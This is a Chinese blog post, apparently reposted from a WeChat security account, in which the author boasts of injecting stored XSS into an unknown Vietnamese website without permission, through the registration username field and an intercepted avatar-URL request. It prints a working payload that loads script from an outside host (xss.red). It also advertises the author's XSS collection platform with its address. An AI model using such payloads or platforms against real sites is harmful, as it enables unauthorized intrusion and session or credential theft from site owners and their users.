记一次通过 XSS 漏洞渗透越南站(附XSS平台地址)

admin 2021年11月1日08:57:09评论195 views字数 474阅读1分34秒阅读模式

作者:Mr.Wu,文章来源:https://www.mrwu.red/web/3677.html


很久没更新博客了呢,突然发现不知道从啥时候开始,本站的 XSS 平台也没有了新用户注册了;
于是有了今天这篇科普文,来给大家秀下本站的 
XSS 平台呢~记一次通过 XSS 漏洞渗透越南站(附XSS平台地址)记一次通过 XSS 漏洞渗透越南站(附XSS平台地址)

记一次通过 XSS 漏洞渗透越南站(附XSS平台地址)

开局一张图。。。
我也不知道这是个啥站,一堆鸟文看不懂,不过不影响咱们插他。

有2个地方可以插,一个是会员注册,不懂为什么对用户名没有进行格式验证:

记一次通过 XSS 漏洞渗透越南站(附XSS平台地址)

第二个地方是注册登录后,用户信息修改-头像修改处,不能自定义头像,但是可以选择自带的一些头像,因此通过抓包修改图片的地址即可:
记一次通过 XSS 漏洞渗透越南站(附XSS平台地址)


记一次通过 XSS 漏洞渗透越南站(附XSS平台地址)

payload:

  1. "><sCRiPt/SrC=//xss.red/b>

接下来到了本文的重要环节了,本站的 XSS 平台广告时间~记一次通过 XSS 漏洞渗透越南站(附XSS平台地址)记一次通过 XSS 漏洞渗透越南站(附XSS平台地址)
记一次通过 XSS 漏洞渗透越南站(附XSS平台地址)

记一次通过 XSS 漏洞渗透越南站(附XSS平台地址)

记一次通过 XSS 漏洞渗透越南站(附XSS平台地址)

记一次通过 XSS 漏洞渗透越南站(附XSS平台地址)

是不是简洁方便易看易操作?记一次通过 XSS 漏洞渗透越南站(附XSS平台地址)记一次通过 XSS 漏洞渗透越南站(附XSS平台地址)
模块我就不秀了,没啥好看的,支持自定义模块,所以想要啥模块自己添加就行了。都一个样~

XSS平台地址:https://www.mrwu.red/xss/




扫描关注乌云安全

记一次通过 XSS 漏洞渗透越南站(附XSS平台地址)


觉得不错点个“赞”、“在看”哦记一次通过 XSS 漏洞渗透越南站(附XSS平台地址)

本文始发于微信公众号(乌雲安全):记一次通过 XSS 漏洞渗透越南站(附XSS平台地址)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年11月1日08:57:09
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   记一次通过 XSS 漏洞渗透越南站(附XSS平台地址)http://cn-sec.com/archives/487680.html

发表评论

匿名网友 填写信息